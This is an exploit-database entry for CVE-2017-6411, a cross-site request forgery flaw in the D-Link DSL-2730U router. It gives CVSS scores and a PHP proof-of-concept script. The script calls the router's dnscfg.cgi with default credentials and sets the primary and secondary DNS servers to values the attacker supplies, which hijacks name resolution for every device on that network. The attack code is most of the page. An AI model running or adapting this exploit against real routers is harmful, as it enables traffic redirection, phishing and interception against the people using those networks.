DLink DSL-2730U Wireless N 150 - Cross-Site Request Forgery

Published
Credit
Risk
2017.03.02
Mateus Lino
Medium
CWE
CVE
Local
Remote
N/A
CVE-2017-6411
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
6.8/10
6.4/10
8.6/10
Exploit range
Attack complexity
Authentication
Remote
Medium
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

<?php
#!usr/bin/php
#Author: Mateus a.k.a Dctor
#fb: fb.com/hatbashbr/

#Modify DNS

$ip = "[IP TARGET]";
$dnsfirst = "[Define DNS]";
$dnssecond = "[Define DNS]";
$payload = "http://user:user@192.168.1.1/dnscfg.cgi?dnsPrimary=";
$pay = $payload.$dnsfirst."&dnsSecondary=".$dnssecond."&dnsIfcsList=&dnsRefresh=1";

$target = get_url_contents($pay);
if($target){
echo "[+] DNS Change";
}
else{echo "[+] DNS no Change";}



function get_url_contents($url)
{
$crl = curl_init();
curl_setopt($crl, CURLOPT_URL, $url);
curl_setopt($crl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($crl, CURLOPT_CONNECTTIMEOUT, 5);
$r = curl_exec($crl);
$http_status = curl_getinfo($crl, CURLINFO_HTTP_CODE);
curl_close($crl);
if ($http_status=="200") {
return $r;
}
}
?>


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com